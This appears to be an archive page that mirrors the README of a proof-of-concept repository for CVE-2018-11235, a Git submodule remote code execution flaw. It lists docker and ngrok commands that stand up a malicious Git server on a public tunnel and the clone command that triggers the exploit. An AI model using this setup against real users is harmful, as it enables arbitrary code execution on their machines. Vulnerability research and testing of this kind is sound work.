Goal Reached Thanks to every supporter — we hit 100%!

Goal: 1000 CNY · Raised: 1310 CNY

100%
Buy Us a Coffee

CVE-2018-11235 PoC — Git 安全漏洞

Source
https://github.com/twseptian/cve-2018-11235-git-submodule-ce-and-docker-ngrok-configuration
Associated Vulnerability
Title:Git 安全漏洞 (CVE-2018-11235)
Description:In Git before 2.13.7, 2.14.x before 2.14.4, 2.15.x before 2.15.2, 2.16.x before 2.16.4, and 2.17.x before 2.17.1, remote code execution can occur. With a crafted .gitmodules file, a malicious project can execute an arbitrary script on a machine that runs "git clone --recurse-submodules" because submodule "names" are obtained from this file, and then appended to $GIT_DIR/modules, leading to directory traversal with "../" in a name. Finally, post-checkout hooks from a submodule are executed, bypassing the intended design in which hooks are not obtained from a remote server.
Description
CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
Readme
# CVE-2018-11235-Git-Submodule-CE + Docker Ngrok Configuration
CVE-2018-11235-Git PoC and tunneling with docker ngrok

### Build Dockerfile
```bash
$ docker build -t cve-2018-11235 .
```

### Create custom network for `ngrok`
```bash
$ docker network create myngroknet
```

### Start Git Http Server
```bash
$ docker run -d -p 8080:80 --net myngroknet --name cve-2018-11235 cve-2018-11235
```

### Start Ngrok HTTP Server for Git Server
```bash
$ docker run -d -p 4040:4040 --net myngroknet --name ngrok wernight/ngrok ngrok http cve-2018-11235:80 --authtoken PUT_YOUR_NGROK_AUTHTOKEN
```

### You can now access the API to find the assigned domain:
```bash
$ curl $(docker port www_ngrok 4040)/api/tunnels
{"tunnels":[{"name":"command_line","uri":"/api/tunnels/command_line","public_url":"https://f5fc-116-206-35-27.ngrok.io","proto":"https","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}},{"name":"command_line (http)","uri":"/api/tunnels/command_line%20%28http%29","public_url":"http://f5fc-116-206-35-27.ngrok.io","proto":"http","config":{"addr":"http://cve-2018-11235:80","inspect":true},"metrics":{"conns":{"count":0,"gauge":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0},"http":{"count":0,"rate1":0,"rate5":0,"rate15":0,"p50":0,"p90":0,"p95":0,"p99":0}}}],"uri":"/api/tunnels"}
```


### PoC on Vulnerable Git Server
```bash
$ git clone --recurse-submodules http://f5fc-116-206-35-27.ngrok.io/malicious.git
```

### References:
- [CVE-2018-11235 git RCE](https://staaldraad.github.io/post/2018-06-03-cve-2018-11235-git-rce/)
- [CVE-2018-11235-Git-Submodule-CE](https://github.com/qweraqq/CVE-2018-11235-Git-Submodule-CE)
- [Expose Docker Container services on the Internet using the ngrok docker image](https://medium.com/oracledevs/expose-docker-container-services-on-the-internet-using-the-ngrok-docker-image-3f1ea0f9c47a)
- [wernight/ngrok](https://hub.docker.com/r/wernight/ngrok/)
- [CVE-2018-11235 - Quick & Dirty PoC](https://atorralba.github.io/CVE-2018-11235/)
File Snapshot

Log in to view the POC file snapshot cached by Shenlong Bot

Log in to view
Remarks
    1. It is advised to access via the original source first.
    2. Local POC snapshots are reserved for subscribers — if the original source is unavailable, the local mirror is part of the paid plan.
    3. Mirroring, verifying, and maintaining this POC archive takes ongoing effort, so local snapshots are a paid feature. Your subscription keeps the archive online — thank you for the support. View subscription plans →